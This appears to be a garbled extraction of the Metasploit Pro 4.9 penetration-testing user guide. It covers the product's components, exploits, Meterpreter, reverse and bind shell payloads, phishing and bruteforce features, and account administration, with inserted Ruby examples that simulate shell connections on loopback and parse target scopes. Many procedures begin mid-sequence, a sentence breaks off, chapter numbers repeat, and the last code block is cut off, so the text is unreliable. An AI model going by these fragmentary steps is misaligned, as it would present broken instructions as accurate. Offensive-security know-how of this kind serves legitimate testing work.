Release 4.9
Table of Contents

Chapter 1: Introduction to Metasploit Pro
  About Metasploit Pro
  Supported Operating Systems
  Metasploit Pro Components
  Metasploit Implementation
    Bind Shell Payload, Database, Discovery Scan, Exploit, Listener, Meterpreter, Modules, Payload, Project, Reverse Shell Payload, Shell, Shellcode, Task, Vulnerability
  Metasploit Pro Workflow

Chapter 2: Wizards
  Target Profiles
  Configure Scan Settings
  Configure Exploit Settings
  Configure Report Settings
  The Phishing Campaign Wizard
  About the Phishing Campaign Wizard
  Create a Project
  Configure the Phishing Campaign
  Web Application Test Wizard
  Configure General Settings
  Configure Authentication Settings
  Configure Vulnerability Discovery Settings
  Configure Vulnerability Exploit Settings
  Configure Report Settings

Chapter 3: Metasploit Tour
  Access the Metasploit Web UI
  Supported Browsers
  Browser Requirements
  User Interface Overview
  Navigational Menu and Features
  Keyboard Shortcuts

Chapter 4: Administration
  Account Management
  Account Types
  Creating a User Account
  Changing an Account Password
  Resetting the Password for a User Account
  Deleting a User Account
  Setting the Time Zone
  Account Requirements
  System Management
  Global Settings
  Setting HTTP Payloads
  Setting HTTPS Payloads
  Enabling Automatic Updates
  Disabling Automatic Updates
  Automatically Enabling an HTTP Proxy for Updates
  Defining SMTP Settings for a Mail Server
  Removing Metasploit
  License Keys
  Getting a License Key
  Activating a License Key for the First Time
  Updating a License Key
  Performing an Offline Activation
  Reverting to the Previous License Key
  Services
  Restarting Metasploit Services on Windows
  Restarting Metasploit Services on Linux
  Logs
  Log File Locations
  System Updates
  Notification Center
  Accessing Notification Center
  Notification Events
  Sorting Notifications by Event Type
  Clearing a Notification
  Updating the System
  Updating Metasploit Offline

Chapter 4: Host Management
  Host Management Interfaces
  Tour of the Analysis Area
  Tour of the Single Host Page
  Viewing and Editing Host Metadata
  Viewing Host Metadata
  Editing Host Information
  Adding and Deleting Hosts
  Adding a Host to a Project
  Deleting a Host from a Project
  Adding, Editing, and Deleting Services
  Adding a Service to a Host
  Editing a Service
  Deleting a Service from a Host
  Adding, Editing, and Deleting Vulnerabilities
  Adding a Vulnerability to a Host
  Adding a Vulnerability Reference
  Deleting a Vulnerability Reference
  Deleting a Vulnerability from a Host
  Deleting a Vulnerability from All Hosts
  Adding, Editing, and Deleting Credentials
  Viewing Credentials for a Project
  Viewing Credentials for a Host
  Adding a Known Credential Pair
  Editing a Credential Pair
  Deleting a Credential Pair from a Host
  Adding, Editing, Downloading, and Deleting Captured Data
  Adding Captured Data to a Host
  Downloading a Captured Data File
  Viewing a Captured Data File
  Viewing All Captured Data in a Project
  Deleting Captured Data from a Project

Chapter 5: Projects
  About Projects
  Project Components
  Project Management
  Creating a Project
  Viewing All Projects
  Importing Data from Other Projects
  Deleting a Project
  Changing the Project Owner
  Managing User Access
  Setting the Network Range
  Restricting a Project to a Network Range
  Team Collaboration
  User Access Management
  Host Comments

Chapter 6: Modules
  Module Types
  Modules Excluded from Metasploit Pro
  Common Module Options
  Running a Module
  Module Search
  Keyword Tags
  Module Statistics
  Viewing Module Statistics
  Module Rankings

Chapter 7: Scanning
  About Scanning
  Discovery Scans
  Data Gathered during a Discovery Scan
  How a Discovery Scan Works
  Ports Included in the Discovery Scan
  Supported Scan Data Types
  Discovery Scan Options
  IPv6 Addresses
  Virtual Host Discovery
  Discovery Scan Tasks
  Running a Discovery Scan
  Scanning for H.323 Conferencing Systems
  Defining Nmap Arguments
  Viewing the Results from a Scan
  Host Management
  Advanced Search
  Parts of an Advanced Search Query
  Advanced Keyword Search Examples
  Nested Searches
  Adding a Host Manually
  Viewing Services for a Host
  Viewing Host Notes
  Deleting a Host
  Viewing Captured Data
  Viewing Vulnerabilities
  Viewing Tags
  Importing Scan Data
  Viewing Exploits for Known Vulnerabilities

Chapter 7: Validating Nexpose Vulnerabilities
  Getting Started with Vulnerability Validation
  Methods for Validating Vulnerabilities
  About the Vulnerability Validation Wizard
  Vulnerability Validation Terminology
  Before You Begin
  Validating Nexpose Vulnerabilities with the Vulnerability Validation Wizard
  Importing and Exploiting Imported Nexpose Data
  Scanning Nexpose Sites and Exploiting Identified Vulnerabilities
  Tracking Real-Time Statistics and Events for Vulnerability Validation
  Accessing the Findings Window
  The Statistics Tab
  The Tasks Log Tab
  Nexpose Exceptions
  The Exceptions Page
  Creating and Pushing Nexpose Exceptions
  Viewing Vulnerability Exceptions in Nexpose
  Validated Vulnerabilities
  Pushing Validated Vulnerabilities Back to Nexpose
  Viewing Validated Vulnerabilities in Nexpose
  Searching for Validated Vulnerabilities in Nexpose

Chapter 8: Nexpose
  About Nexpose
  Nexpose Terminology
  Nexpose Integration with Metasploit
  Nexpose Scan
  Before You Run a Nexpose Scan
  Configuring a Nexpose Console
  Import Nexpose Data
  Importing Vulnerability Data from Nexpose
  Excluding Hosts from a Nexpose Data Import
  Running a Nexpose Scan
  Running a Nexpose Scan with a Custom Template
  Purging Scan Data
  Passing the Hash from Metasploit
  Searching for Tagged Nexpose Assets
  Importing Nexpose Data
  Vulnerability Exceptions
  Reasons for Vulnerability Exceptions
  Creating a Vulnerability Exception
  Nexpose Asset Groups
  Creating a Nexpose Asset Group
  Automatically Tagging Assets from a Nexpose Scan
  Automatically Tagging Assets from a Nexpose Import
  Vulnerability Tracking
  Viewing the Vulnerability Overview Page
  Vulnerability Details Page
  Host Details Page

Chapter 9: Password Cracking
  About Password Cracking
  Bruteforce Attacks
  Running a Bruteforce Attack
  Running a Bruteforce Attack against a VM
  Running a Bruteforce Attack with a Password List
  Running a Bruteforce Attack with a Single Credential
  Importing a Password List
  Credential Management
  Supported Credential Formats
  Word Lists
  Importing a Custom Word List
  Selecting a Custom Word List
  Viewing Imported Credentials
  Viewing Metasploit Word Lists
  Deleting Imported Word Lists

Chapter 10: Exploitation
  About Exploitation
  Automated Exploits
  Manual Exploits
  Components of an Exploit
  Common Exploitation Tasks
  Searching for Exploits
  Running Automated Exploits
  Running a Single Exploit
  Setting Up a Listener
  Enabling and Disabling a Listener
  Stopping a Listener

Chapter 11: Payloads
  The Payload Generator
  Accessing the Payload Generator
  Building Dynamic Payloads
  Building Classic Payloads
  Listeners

Chapter 12: MetaModules
  About MetaModules
  Tour of the MetaModules Overview Page
  MetaModule Runs
  MetaModule Findings
  Deleting a MetaModule Run
  Single Password Testing MetaModule
  Lockout Risks
  Running the Single Password Testing MetaModule
  SSH Key Testing MetaModule
  Running the SSH Key Testing MetaModule
  Pass the Hash MetaModule
  Running the Pass the Hash MetaModule
  Known Credentials Intrusion MetaModule
  Running the Known Credentials Intrusion MetaModule
  Segmentation and Firewall Testing MetaModule
  Egress Scan Target Port States
  Running the Segmentation and Firewall Testing MetaModule
  Passive Network Discovery MetaModule
  Running the Passive Network Discovery MetaModule
  MetaModule Reports
  Firewall Egress Testing Report
  Passive Network Discovery Findings Report
  Auth MetaModule Reports

Chapter 13: Web Scans
  Web Application Testing
  Authenticated Web Scans
  Creating a URL Blacklist for Web Scans
  Enabling Secure Socket Layer Checks for Web Scans
  Web Audit
  Web Application Exploit
  Web Application Assessment Report
  Web Application Assessment Report Sections
  Web Application Assessment Report Engagement Scope
  Web Application Assessment Report Summary Graphs
  OWASP Top 10 Web Application Security Risk Summary
  Web Application Assessment Report Vulnerability Details
  Web Application Assessment Report Remediation
  Web Application Assessment Report Glossary
  Web Application Tests
  Web Application Assessment Report Options
  Generating a Web Application Assessment Report
  Viewing Web Vulnerability Details
  Web Vulnerability Categories
  Vulnerability Proof Text

Chapter 15: Host Tags
  About Host Tags
  Components of a Host Tag
  Host Tag Tasks
  Creating a Host Tag
  Deleting a Host Tag
  Applying a Host Tag
  Updating a Host Tag
  Automatically Tagging Discovered Hosts
  Automatically Tagging Imported Hosts
  Searching for Hosts by Host Tag

Chapter 16: Sessions
  About Sessions
  Active Sessions
  Command Shell Session
  Meterpreter Sessions
  Authentication Notes
  Session Tasks
  Session Details
  Proxy Pivot
  VPN Pivot
  Virtual Interfaces
  VNC Sessions
  File Systems

Chapter 17: Social Engineering
  About Social Engineering
  Social Engineering for Metasploit 4.4 and Older
  Viewing Legacy Campaigns
  Generating a Report for Legacy Campaigns
  Social Engineering Techniques
  Phishing
  Client-Side Exploits
  File Format Exploits
  Java Signed Applets
  Portable Files
  Social Engineering Components
  Social Engineering Workflow
  Social Engineering Terminology
    Browser Autopwn, Campaign, Click Tracking, E-mail Template, Executable, File Format Exploit, Human Target, Phishing Attack, Portable File, Resource File, Social Engineering, Target List, Tracking GIF, Tracking Link, Tracking String, Visit, Web Template
  Campaign Dashboard
  Campaign Tasks Bar
  Campaign Widgets
  Modal Windows
  Action Links
  Campaigns
  Campaign Restrictions
  Campaign States
  Campaign Management
  Creating a Campaign
  Editing the Campaign Name
  Running a Campaign
  Clearing the Data from a Campaign
  Viewing the Findings for a Campaign
  Adding a Campaign Component
  Removing a Campaign Component
  Stopping a Campaign
  Sending an E-mail Notification when a Campaign Starts
  Deleting a Campaign
  Exporting a CSV File of Campaign Findings
  Exporting a CSV File of E-mail Sent from a Campaign
  Exporting a CSV File of Human Targets that Opened the E-mail
  Exporting a CSV File of Human Targets that Clicked on the Link
  Exporting a CSV File of Human Targets that Submitted the Form
  Campaign Components
  E-mail
  Web Page
  Portable File
  Reusable Campaign Resources
  Target Lists
  Templates
  E-mail Templates
  Malicious Files
  USB Key Campaigns
  Executable Files
  File Format Exploits
  Phishing Campaigns
  How a Phishing Campaign Works
  Before You Create a Phishing Campaign
  Creating a Phishing Attack
  Working with Sessions
  Checking for Open Sessions
  Cleaning Up Sessions
  Social Engineering Report
  Social Engineering Report Sections
  Generating a Social Engineering Details Campaigns Report

Chapter 18: Task Chains
  About Task Chains
  Task Chain UI Tour
  Supported Tasks
  Working with Task Chains
  Creating a Task Chain
  Adding a Task to a Task Chain
  Cloning a Task
  Rearranging Tasks in a Task Chain
  Adding a Post-Exploitation Module to a Task Chain
  Removing a Task from a Task Chain
  Clearing the Project Data before a Task Chain Runs
  Resetting a Task Chain
  Running a Task Chain
  Managing and Editing Task Chains
  Editing a Task Chain
  Cloning a Task Chain
  Suspending a Task Chain
  Updating the Schedule for a Task Chain
  Stopping a Running Task Chain
  Stopping All Running Tasks
  Viewing the Tasks Log
  Cleaning Up Open Sessions
  Deleting a Task Chain
  Task Chain Schedules
  Schedule Options
  Scheduling a Task Chain
  Suspending a Schedule
  Setting the Maximum Duration for a Task Chain

Chapter 19: Reports
  About Reports
  Report Output Formats
  Reports Directory
  Report Logs
  Using the Reporting Interface
  Metasploit Report Types
  Understanding Report Types
  Generating, Downloading, Viewing, E-mailing, Cloning and Deleting Reports
  Notification Center Statuses for Reports
  Generating a Standard Report
  Generating a Custom Report
  Downloading a Report
  Viewing a Report
  E-mailing a Report
  Cloning a Report Configuration
  Deleting Reports
  Customizing Standard Reports
  Excluding Report Sections
  Excluding and Including Hosts from Reports
  Masking Credentials from Reports
  Removing Charts from Reports
  Including Web Page HTML in Social Engineering Reports
  Customizing Report Names
  Adding a Custom Logo to a Report
  Working with Custom Templates
  Jasper Reports and iReport Designer
  Requirements for Designing Custom Templates
  Setting Up the Metasploit Database in iReport Designer
  Custom Resources Directory
  Uploading Templates
  Downloading a Custom Report Template
  Deleting a Custom Report Template
  Downloading the Example Template
  Exporting Data
  Exports Directory
  Export Logs
  Notification Center Statuses for Exports
  Export Types
  Viewing Exported Data

Frequently Asked Questions
Glossary
Chapter 1:
Introduction to Metasploit Pro
- About Metasploit Pro on page 2
- Metasploit Pro Components on page 3
- Metasploit Implementation on page 4
- Metasploit Pro Workflow on page 7

Supported Operating Systems
Linux
- Red Hat Enterprise Linux 5.x, 6.x - x86 and x86_64
- Ubuntu Linux 8.04, 10.04, 12.04 - x86 and x86_64
- BackTrack
- Kali
Windows

Metasploit Pro Components
Metasploit Framework
An open source penetration testing and development platform that provides access to every module that Metasploit Pro needs to perform its tasks. The Metasploit Framework contains an exploit database that provides the latest exploit code for various applications, operating systems, and platforms. You can leverage the Metasploit Framework to create additional custom security tools or to write your own exploit code for new vulnerabilities. The Metasploit team releases weekly updates that contain new modules and bi-weekly updates that contain fixes and enhancements for known issues with Metasploit Pro.
Modules
A module is a standalone piece of code that extends the functionality of the Metasploit Framework. Modules automate the functionality that the Metasploit Framework provides and enable you to perform tasks with Metasploit Pro. A module can be an exploit, auxiliary, payload, NOP generator, or post-exploitation module. The module type determines its purpose. For example, a module that triggers a vulnerability to run a payload on a target is an exploit module, and a module that runs against a host you already have a session on is a post-exploitation module.
Services
Metasploit Pro uses three services: PostgreSQL, Ruby on Rails, and the Pro service. PostgreSQL runs the database that Metasploit Pro uses to store project data. Ruby on Rails runs the Metasploit Pro web interface. The Pro service, also called the Metasploit service, bootstraps Rails, the Metasploit Framework, and the Metasploit RPC server.
User Interface
The component that you use to interact with Metasploit Pro. To launch the user interface, open a web browser and go to https://localhost:3790.
Metasploit Implementation
Rapid7 distributes Metasploit Pro as an executable installer for Linux and Windows. Download and run the installer to set up Metasploit Pro on your local machine or on a remote host, such as a web server. Wherever you install it, you always access the user interface through a web browser, and the interface is served only over HTTPS.

If you install Metasploit Pro on a server, users can reach the user interface from any location that can connect to the server's address and port. By default, the Metasploit service listens on port 3790; you can change the port during installation. For example, if Metasploit Pro runs on 192.168.184.142 on port 3790, users open https://192.168.184.142:3790 to launch the user interface. If Metasploit Pro runs on your local machine, use https://localhost:3790 instead.

Because the interface gives full control over every project, credential, and session that Metasploit Pro holds, restrict network access to that port to the hosts your testers use rather than exposing it to the whole network.

If you have not installed Metasploit Pro, you can download the installer from the Rapid7 website. You will need a license key to activate the product. If you do not have a license key, contact the Rapid7 sales team at sales@rapid7.com.
Database
The database stores target host data, system logs, collected evidence, and report data.
Discovery Scan
A discovery scan is the Metasploit internal scanner that combines Nmap and several Metasploit modules to scan and fingerprint targets. If you do not have Nexpose or scan data to import into Metasploit Pro, you can run a discovery scan to gather information about the target. There are several scan speeds that you can configure for a discovery scan. The scan speed determines the method that the discovery scan uses to perform the discovery process.
Exploit
An exploit is a program that takes advantage of a specific vulnerability and provides an attacker with access to the target system. An exploit typically carries a payload and delivers it to the target system. For example, one of the most common exploits is windows/smb/ms08_067_netapi, which targets the MS08-067 vulnerability in the Windows Server service that allows remote code execution. You can run this exploit against a machine that has the MS08-067 vulnerability to take control of the system remotely.
Listener
A listener waits for an incoming connection from either the exploited target or the attacking machine and manages the connection when it receives it.
Meterpreter
Meterpreter is an advanced, multi-function payload that provides an interactive shell. From the Meterpreter shell you can download files, obtain the password hashes for user accounts, and pivot into other networks. Meterpreter runs in memory and does not write itself to disk, which keeps it out of view of many disk-based antivirus and host intrusion detection tools; it remains visible to network monitoring and memory-based detection, so do not treat it as undetectable.
Modules
A module is a standalone piece of code that extends the functionality of the Metasploit Framework; see Modules under Metasploit Pro Components for the module types.
Payload
A payload is the code that runs on the target system after an exploit succeeds. A payload can be a reverse shell payload or a bind shell payload; the difference between them is the direction of the connection once the exploit has run. A reverse shell payload makes the target connect back to a listener on the attacking machine, which gets through most outbound firewall rules. A bind shell payload opens a listening port on the target and waits for the attacking machine to connect, which a host or network firewall in front of the target may block.
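The two connection directions, as an added example that is not part of the Metasploit Pro guide or of Metasploit's own code: both ends run in one Ruby process on the loopback interface, and the "shell" answers a single whoami request instead of executing commands. The function and message names are this example's own.

```ruby
require 'socket'

# Added example (not from the Metasploit Pro guide): shows the one thing that
# differs between a bind shell payload and a reverse shell payload, the
# direction of the TCP connection. Both sides run in-process on 127.0.0.1 and
# exchange a single request/response instead of spawning a real shell.

# What the "payload" does once a connection exists is the same in both cases:
# read one command, reply with its result. Only "whoami" is implemented, so
# nothing on the host is executed.
def serve_command(sock)
  cmd = sock.gets&.chomp
  reply = cmd == 'whoami' ? "user:#{ENV['USER'] || 'unknown'}" : "unknown command: #{cmd}"
  sock.puts(reply)
  sock.close
end

# Attacker side: send a command over an established socket and collect the reply.
def run_command(sock, cmd)
  sock.puts(cmd)
  sock.gets.chomp
ensure
  sock.close
end

# Reverse shell: the attacker listens; the target connects out.
# Egress filtering on the target decides whether this works.
def reverse_shell_demo
  listener = TCPServer.new('127.0.0.1', 0)      # attacker's listener (handler)
  port = listener.addr[1]
  target = Thread.new { serve_command(TCPSocket.new('127.0.0.1', port)) }
  result = run_command(listener.accept, 'whoami')
  target.join
  listener.close
  result
end

# Bind shell: the target listens on a port; the attacker connects in.
# Ingress filtering in front of the target decides whether this works.
def bind_shell_demo
  bound = TCPServer.new('127.0.0.1', 0)         # payload opens a port on the target
  port = bound.addr[1]
  target = Thread.new { serve_command(bound.accept); bound.close }
  result = run_command(TCPSocket.new('127.0.0.1', port), 'whoami')
  target.join
  result
end

if $PROGRAM_NAME == __FILE__
  puts "reverse: #{reverse_shell_demo}"
  puts "bind:    #{bind_shell_demo}"
end
```

Port 0 asks the kernel for a free ephemeral port, which is what makes the two demos safe to run side by side; in a real engagement the reverse listener is the port you set on the handler, and the bind port is a module option on the payload.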
Project
A project is a container for the targets, tasks, reports, and data that are part of a penetration test. A project represents the workspace that you use to create a penetration test and configure tasks. Every penetration
Shell
A shell is a console-like interface that provides you with access to a remote target.
Shellcode
Shellcode is the set of instructions that an exploit uses as the payload.
Task
A task represents an action that Metasploit Pro can perform, such as scanning hosts, bruteforcing credentials, exploiting vulnerable targets, or generating a report.
Vulnerability
A vulnerability is a security flaw or weakness in an application or system, such as a buffer overflow, that enables an attacker to compromise the target system. A compromised system can result in privilege escalation, denial of service, unauthorized data access, and stolen passwords.
Chapter 2:
Wizards
Metasploit Pro includes several wizards that provide a guided interface that walks you through a few of the most common tasks in penetration testing, such as a standard penetration test, a phishing campaign, and a web application test. To get started with one of the wizards, read the following topics:
- Quick PenTest Wizard on page 9
- About the Phishing Campaign Wizard on page 17
- Web Application Test Wizard on page 19
Target Settings
Target Profiles
When you launch the Quick PenTest Wizard, it displays a list of target profiles that you can select for the test. A target profile uses the host information obtained by the scan to build an attack plan based on the system and device type. There are target profiles for Windows targets, *nix servers, web servers, and network devices. If you want to exploit all systems and devices, use the Everything target profile. For example, if you choose the Web Servers target profile, Metasploit Pro only exploits systems that are running an HTTP or HTTPS service and skips systems that do not match the target profile.
Note: If the test does not find any systems that match the selected target profile, it skips the exploitation phase.
- Windows Targets - Any server or client that runs any version of Windows.
- *nix Servers - Any server or client that runs a Linux operating system, or any server or client that runs a UNIX-like operating system or a common UNIX service, such as SSH or inetd.
- Web Servers - Any server that runs an HTTP or HTTPS service.
- Network Devices - Any system that is not a server or a client. These systems typically do not run a standard operating system, like Windows or Linux. Some examples of network devices are printers, faxes, and routers.
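The host-to-profile matching that the four profiles and the Everything profile imply, as an added example that is not part of the Metasploit Pro guide or of Metasploit's own code. The host records are constructed here, and the attribute names (:os, :services) and the regular expressions used to recognise operating systems are this example's own; Metasploit Pro's real fingerprint matching is not documented on this page.

```ruby
# Added example, not part of the Metasploit Pro guide: selects hosts for the
# exploitation phase according to the Quick PenTest Wizard's target profiles.

# Operating-system and service patterns are this example's assumptions.
WINDOWS_OS = /windows/i
UNIX_OS    = /linux|unix|bsd|solaris|aix|darwin|mac os/i
UNIX_SERVICES = %w[ssh inetd].freeze
WEB_SERVICES  = %w[http https].freeze

PROFILES = {
  'Windows Targets' => ->(h) { h[:os].to_s.match?(WINDOWS_OS) },
  '*nix Servers'    => ->(h) { h[:os].to_s.match?(UNIX_OS) || (h[:services] & UNIX_SERVICES).any? },
  'Web Servers'     => ->(h) { (h[:services] & WEB_SERVICES).any? },
  # "Not a server or a client": no standard desktop or server OS was fingerprinted.
  'Network Devices' => ->(h) { !h[:os].to_s.match?(WINDOWS_OS) && !h[:os].to_s.match?(UNIX_OS) },
  'Everything'      => ->(_h) { true },
}.freeze

# Hosts the chosen profile passes to the exploitation phase.
def select_targets(hosts, profile)
  rule = PROFILES.fetch(profile) { raise ArgumentError, "unknown profile #{profile}" }
  hosts.select { |h| rule.call(h) }
end

# Mirrors the wizard note: with no matching hosts the exploitation phase is skipped.
def attack_plan(hosts, profile)
  targets = select_targets(hosts, profile)
  return { exploit_phase: :skipped, targets: [] } if targets.empty?
  { exploit_phase: :run, targets: targets.map { |h| h[:ip] } }
end

# Constructed sample inventory, shaped like what a discovery scan reports.
SAMPLE_HOSTS = [
  { ip: '10.0.0.5', os: 'Windows Server 2008 R2', services: %w[smb http rpc] },
  { ip: '10.0.0.6', os: 'Linux 3.x',              services: %w[ssh https] },
  { ip: '10.0.0.7', os: 'Unknown',                services: %w[snmp telnet] }, # printer or router
  { ip: '10.0.0.8', os: 'Windows 7',              services: %w[smb] },
].freeze

if $PROGRAM_NAME == __FILE__
  PROFILES.each_key { |p| puts "#{p}: #{attack_plan(SAMPLE_HOSTS, p)}" }
end
```

Run it and the Windows profile returns two targets, Web Servers two, *nix Servers one, and Network Devices only the host with no recognised operating system; remove the Windows hosts and the Windows profile reports the exploitation phase as skipped.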
2. When the Phishing Campaign window appears, enter a name for the project. The project name can use any combination of alphanumeric characters, special characters, and spaces.
3. In the Address Range field, enter an address range for the project. This step is optional. Note: The address range sets the default addresses that automatically populate the Target Addresses field for Discovery Scans and Nexpose Scans. Metasploit Pro does not enforce the network address range unless you enable the network restriction option. If you want to enter multiple network ranges, use a comma to separate each one.
4. Click the Next button to launch the campaign configuration page. Now, you are ready to configure the campaign components. The first thing you should do is provide a name for the campaign. Metasploit Pro will automatically save the campaign each time you click on a widget to open a campaign component.
After you name the campaign, you will need to configure the e-mail and web page components. Then, you will need to define the settings for your SMTP server and web server. To configure the campaign components, click on any of the widgets on the campaign configuration form. The corresponding configuration window will open for the component that you chose.
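A parser for the comma-separated address range list that step 3 describes, together with the network restriction check it mentions, as an added example that is not part of the Metasploit Pro guide or of Metasploit's own code. The accepted forms (single addresses, CIDR blocks, and dashed first-last ranges), the function names, and the way the ranges are stored are this example's assumptions; the page does not say exactly which syntaxes Metasploit Pro accepts.

```ruby
require 'ipaddr'

# Added example, not part of the Metasploit Pro guide: parses a project's
# address range list and applies the "network restriction" option to a set of
# requested target addresses.

# One entry of the list, kept as an inclusive [first, last] pair of IPAddr.
def parse_entry(entry)
  entry = entry.strip
  case entry
  when %r{\A([^/\s]+)/(\d+)\z}                     # CIDR block, e.g. 192.168.184.0/24
    net = IPAddr.new(entry).to_range
    [net.first, net.last]
  when /\A([^-\s]+)-([^-\s]+)\z/                   # dashed range, e.g. 10.0.0.1-10.0.0.50
    first, last = IPAddr.new($1), IPAddr.new($2)
    raise ArgumentError, "range #{entry} ends before it starts" if last < first
    [first, last]
  else                                             # single address
    ip = IPAddr.new(entry)
    [ip, ip]
  end
end

# The form accepts several entries separated by commas.
def parse_ranges(text)
  text.split(',').reject { |e| e.strip.empty? }.map { |e| parse_entry(e) }
end

def in_scope?(address, ranges)
  ip = IPAddr.new(address)
  ranges.any? { |first, last| ip.family == first.family && ip >= first && ip <= last }
end

# Without the restriction option the range only pre-fills the target field, so
# every requested address passes; with it enabled, out-of-scope addresses are
# dropped before a task runs.
def filter_targets(requested, range_text, restrict:)
  ranges = parse_ranges(range_text)
  return requested unless restrict
  requested.select { |a| in_scope?(a, ranges) }
end

if $PROGRAM_NAME == __FILE__
  scope = '192.168.184.0/24, 10.0.0.1-10.0.0.50, 172.16.5.9'
  asked = %w[192.168.184.142 10.0.0.51 172.16.5.9 8.8.8.8]
  p filter_targets(asked, scope, restrict: false)   # all four pass
  p filter_targets(asked, scope, restrict: true)    # 10.0.0.51 and 8.8.8.8 are dropped
end
```

The family check matters: without it an IPv6 address compared against an IPv4 range raises or silently mismatches, and a scope written only in IPv4 would not protect IPv6-reachable hosts.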
Create a Project
- Crawling URLs - The scan engine crawls and enumerates the web application. This process identifies the URLs and IP addresses that are available for auditing.
- Auditing Vulnerabilities - The scan engine identifies vulnerabilities that exist in the targeted web application, web server, and related databases.
- Exploiting Vulnerabilities - Metasploit Pro automatically generates an exploit map, or attack plan, based on the vulnerabilities identified during the audit. Once the attack plan has been created, Metasploit Pro launches the relevant modules against the identified vulnerabilities and attempts to exploit the web application.
To guide you through this process, the Web Application Test Wizard provides a guided interface that helps you set up a web application test that runs each task automatically. For each task, the wizard shows you a set of the most commonly configured options. You can customize these options or use the default settings. When you switch between task tabs, the wizard validates the configuration for the task. If the wizard identifies any misconfigurations, a red asterisk appears on the tab to alert you that there are settings that need to be reconfigured.
Chapter 3:
Metasploit Tour
The Metasploit Web UI is a browser-based interface that provides access to Metasploit Pro features. You can access the Metasploit Pro Web UI with any supported browser: Google Chrome, Mozilla Firefox, Internet Explorer, and Iceweasel, at the minimum versions listed under Supported Browsers. The topics in this chapter describe the Metasploit Web UI.
Supported Browsers
The user interface runs on the following browsers:
- Google Chrome 10+
- Mozilla Firefox 18+
- Internet Explorer 9+
- Iceweasel 18+
Note: The web user interface may run on other browsers, but Metasploit Pro does not officially support those browsers.
Browser Requirements
You must enable JavaScript so that the user interface displays and functions correctly. If you disable JavaScript, some features may not be visible or available to you. For instructions on how to enable JavaScript, visit http://www.enable-javascript.com.
Additionally, from the Dashboard, you can view the Recent Events log to see the latest activity for the project. This is useful if you are part of a team and want to see what other members have done within the project. Ultimately, the Dashboard helps you quickly assess the data that has been collected for the project at a certain point in time. From the Dashboard, you can launch the configuration page for most tasks, such as discovery scans, Nexpose scans, data imports, web scans, bruteforce attacks, smart exploits, and social engineering campaigns. The two tasks you cannot launch directly from the Dashboard are manual exploits and reports. Each task has its own configuration page that displays all the options and settings that you can define for it. The user interface displays fields for the data you need to enter, check boxes that you can enable or disable depending on your test requirements, and dropdown menus that provide the available options for a particular task.
- Main menu - Use the Main menu to access project settings, edit account information, perform administrative tasks, and view software update alerts.
- Project menu - Use the Project menu to create, edit, open, and view projects.
- Account menu - Use the Account menu to manage your account settings. You can change your password, set the time zone, and edit the contact information for the account.
- Administration menu - Use the Administration menu to manage system updates, license keys, user accounts, and global settings.
- Task bar - Use the task bar to navigate between task pages.
- Navigational breadcrumbs - Use the navigational breadcrumbs to switch between related task pages.
- Quick tasks - Use the quick tasks to access the task configuration page.
Keyboard Shortcuts
A keyboard shortcut uses a combination of keys to invoke a function in Metasploit. Shortcuts make it easier and faster to interact with the web interface, which saves you time as you build and run your penetration tests. The following keyboard shortcuts are available (the key combinations themselves did not survive extraction of this page; only the descriptions remain):
- Opens the Diagnostic Console, if you have the debugging option enabled in the Global Settings.
- Opens the Diagnostic Console, if you have the debugging option enabled in the Global Settings.
- Opens the online help system.
- Closes or opens the selected help icon.
Chapter 4:
Administration
- Account Management on page 30
- System Management on page 37
- License Keys on page 44
- Services on page 50
- Logs on page 52
- System Updates on page 54
Account Management
A user account provides you and your team members with access to Metasploit Pro. You use a user account to log into Metasploit Pro and to create identities for other members of the team. A user account consists of a login name, the user's full name, a password, and a role. Use the following components to set up a user account:
- Login name - The user name that the system uses to uniquely identify a person.
- Full name - The first and last name of the person who owns the user account.
- Password - A string of at least eight characters that allows access to the user account; see Account Requirements for the full password rules.
- Role - The level of access that the user has to Metasploit Pro and its projects. The role can be administrator or basic user.
Account Types
A user account can be a non-administrator account or an administrator account. The account type determines the level of privileges that a user must have to perform certain tasks. For example, administrators have unrestricted access to the system so they can perform system updates, manage user accounts, and configure system settings. Non-administrator accounts, on the other hand, have access to Metasploit Pro, but can only perform a limited set of tasks.
Administrator Account
An administrator account has unrestricted access to all Metasploit Pro features. With an administrator account, you can do things like remove and add user accounts, update Metasploit Pro, and access all projects.
Non-Administrator Account
A non-administrator account gives a user access to Metasploit Pro, but does not provide unlimited control over projects and system settings. This account restricts the user to the projects that they have been granted access to and the projects that they own. A non-administrator account cannot perform the following tasks:
- Create or manage other user accounts.
- Configure global settings for Metasploit Pro.
- Update Metasploit Pro.
- Update the license key.
- View projects that they do not have access to.
2. When the User Administration page appears, click the New User button.
3. When the New User page appears, fill out the following information to create a user account:
   - User name - Enter a user ID for the account.
   - Full name - Enter the user's first and last name.
   - Password - Use mixed case, punctuation, numbers, and at least eight characters to create a strong password.
   - Password confirmation - Re-enter the password.
4. Select the Administrator option if you want to give the account administrative rights. If the account has administrative privileges, the user has unrestricted access to all areas of Metasploit Pro. If the account does not have administrative rights, the user can only work with projects that they have access to and cannot update the system. Grant the Administrator option only to the people who actually manage the installation; everyone else should get a non-administrator account scoped to their projects.
5. If the account does not have administrative rights, click the Show Advanced Options button to choose the projects that the user can access.
3. Click the Settings button.
4. Find the Change Password area.
5. In the New Password field, enter a password for the account. The password must contain at least eight characters and consist of letters, numbers, and at least one special character.
6. Re-enter the password in the Password Confirmation field.
7. Click the Change Password button.
Windows
1. From the Start menu, choose All Programs > Metasploit > Password Reset.
2. When the Password Reset window appears, wait for the environment to load.
3. When the dialog prompts you to continue, enter yes. The system resets the password to a random value.
4. Copy the password and use it the next time you log in to Metasploit Pro. Change the password after you log in, since the generated value was displayed on screen and may remain in the console history.
5. Exit the Password Reset window.
Linux
1. Open the command line terminal and execute the following command: sudo </path/to/metasploit>/diagnostic_shell.
2. If prompted, enter your sudo password.
3. When the system returns the bash# prompt, enter </path/to/metasploit>/apps/pro/ui/script/resetpw to run the resetpw script.
4. Copy the password and use the password the next time you log in to Metasploit Pro. You can change the password after you log in to Metasploit Pro.
5. Exit the console.
3. Click Delete.
3. Choose the time zone that you want to use.
4. Save the changes.
Account Requirements
All accounts must meet the user name and password requirements. If the user name or password does not meet one of the following criteria, Metasploit Pro displays an error until you input a user name and password that complies with every requirement.
Password Requirements
A password must meet the following criteria:
- Contains letters, numbers, and at least one special character.
- Contains at least eight characters.
- Cannot contain the user name.
- Cannot be a common password.
- Cannot use a predictable sequence of characters.
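As an added example (not Metasploit Pro's own code), the following Ruby checker applies the password rules listed above. The common-password list and the definition of a predictable sequence are assumptions, since the page does not specify them.

```ruby
# Added example, not Metasploit Pro's own code: checks a candidate password
# against the requirements listed in the guide and reports each violation.

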